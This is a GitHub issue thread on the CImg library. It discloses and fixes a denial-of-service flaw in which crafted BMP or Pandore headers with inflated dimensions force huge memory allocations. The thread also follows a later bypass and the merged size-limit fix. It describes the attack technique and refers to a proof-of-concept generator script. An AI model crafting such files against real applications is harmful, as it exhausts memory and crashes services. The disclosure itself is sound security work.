New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Denial of service via RAM exhaustion in _load_bmp #343
Comments
|
update: apparently the same type of bug also affects .pandore files |
|
Thanks. I will investigate. I suppose this is not expected? |
|
OK, was using Python 2.7 (the one by default). |
|
Hum, still not look like a .bmp file anyway (112 bytes): |
|
Anyway, I've added some code to check the validity of files. It should help: |
|
Hello, Thanks for responding. Regarding the question if crash.bmp is still valid: I get: so on my system, it still shows up as a valid bmp file |
|
Regarding 619cb58, I think this wont work when reading a virtual file buffer ( When reading the file from disk, the check seems fine to me. It is notable however, that with a large file, one would still be able to cause a big memory allocation but this is not as critical since sending e.g a 4 GB file to an application would probably be prohibted by other sources |
Indeed, but in this case, as the data are read byte by byte, there is not much we can do, because there is actually no way of knowing the amount of data that will be passed through the |
|
Ah thanks, I see the problem here. How about making the limit user controllable? It could have an initial value and then be user stettable. Im thinking of something like |
|
So, 193abd7 is a start :) |
|
I agree! ^^ Now I wonder if this limit should also be used in other places, but at the moment I dont have time to investigate. Maybe one could integrate this check into I will quickly verify if 193abd7 fixes the crash on my machine... |
|
okay so the old crashing images do not crash anymore |
|
Hello again, The statement that I've made about pandore files is wrong. It was a mistake on my end. The fix seems to prevent RAM exhaustion in both filetypes Thank you for your time and dedication :) |
|
Just attaching the initial report for reference: https://huntr.dev/bounties/a5e4fc45-8f14-4dd1-811b-740fc50c95d2/ |
|
Hello, there is a small update: I've been investigating the loading process a bit more and actually found a bypass for the proposed fix. It has to do with buffers that are allocated without size checking through cimg_max_file_size when loading image files via _load_XX. In this instance, I've found the bypass again in the bmp loading process but since this is a general problem (and I am certain that this problem will also occur in other parts of the lib), Ive made a pull request #348 to address it. Ive fuzzed the image loading process of ascii,analyze,inr,pnm,bmp,pandore,dlm and pfm files and not found a single RAM exhaustion with this new change :) Edit: I see that it is merged already. Thanks! |
|
@7unn3l - thanks for the heads up. I have added a comment to the report for reference. |
|
Hi, this is just a gentle ping on this issue. Any news about a fix? |
|
To me, it has been fixed already. See https://huntr.dev/bounties/a5e4fc45-8f14-4dd1-811b-740fc50c95d2/ |
Description
Via a maliciously crafted pandore or bmp file with modified dx and dy header field values it is possible to trick the application into allocating huge buffer sizes like 64 Gigabyte upon reading the file from disk or from a virtual buffer.
Version
This does affect the newest Version of Cimg which is 3.10, commit 607aea7 as the time of writing.
Proof of Concept
Due to the fact that I cannot attach bmp files in this format, here is a small python script that will generate a bmp file with given dimmensions. Note that the final buffer size is calculated by multiplying the product of width and height by 3. This code snippet uses a sample value of 5 GB.
then read the file via standard methods:
The code was compiled with g++ version 9.4.0 on Ubuntu 9.4.0-1ubuntu1~20.04 via
g++ test.cpp -o ./test -ljpeg -lpngRoot cause
line numbers refer to main branch with commit 927fee5
altough safe_size (line 11771) does check for overflows of the size_t type, it does allow very large values . One would think that the try/catch block
try { _data = new T[siz]; }(line 11885) does not allow for allocations that are too big and would completely circumvent this attack but actually, allocations that are equal to the maximum available RAM of a system or even numbers that are a bit higher (I tested the 5 GB case on a 4GB RAM machine) will not thorw an exception like std::bad_alloc.Impact
This vulnerability allows an attacker who can send images to an application to force an premature process exit and exhaust system memory, potentially leading to a full system denial of service.
Prevention
One could define a global constant that regulates the maximum value safe_size can return. The user then could change the default value depending on context.
The text was updated successfully, but these errors were encountered: